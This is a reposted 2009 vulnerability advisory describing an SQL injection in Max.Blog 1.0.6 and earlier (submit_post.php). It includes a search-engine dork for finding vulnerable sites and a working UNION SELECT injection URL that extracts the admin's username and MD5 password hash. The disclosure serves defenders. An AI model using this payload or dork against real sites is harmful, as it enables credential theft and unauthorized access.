Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21230
HistoryJan 28, 2009 - 12:00 a.m.

Max.Blog <= 1.0.6 (submit_post.php) SQL Injection Vulnerability

2009-01-2800:00:00
vulners.com
69

################### Salvatore "drosophila" Fresta ###################

Application: Max.Blog
http://www.mzbservices.com
Version: Max.Blog <= 1.0.6
Bug: * SQL Injection
Exploitation: Remote
Dork: intext:"Powered by Max.Blog"
Date: 27 Jan 2009
Discovered by: Salvatore "drosophila" Fresta
Author: Salvatore "drosophila" Fresta
e-mail: [email protected]

############################################################################

  • BUGS

SQL Injection:

    Requisites: magic quotes = off

    File affected: submit_post.php

    This bug allows a registered user to view username and password &#40;md5&#41; of a
    registered user with the specified id &#40;usually 1 for the admin&#41;

    http://www.site.com/path/submit_post.php?draft=-1&#39;+UNION+ALL+SELECT+1,NULL,NULL,CONCAT&#40;username,char&#40;58&#41;,password&#41;+FROM+users+WHERE+id=1&#37;23

############################################################################


Salvatore "drosophila" Fresta
CWNP444351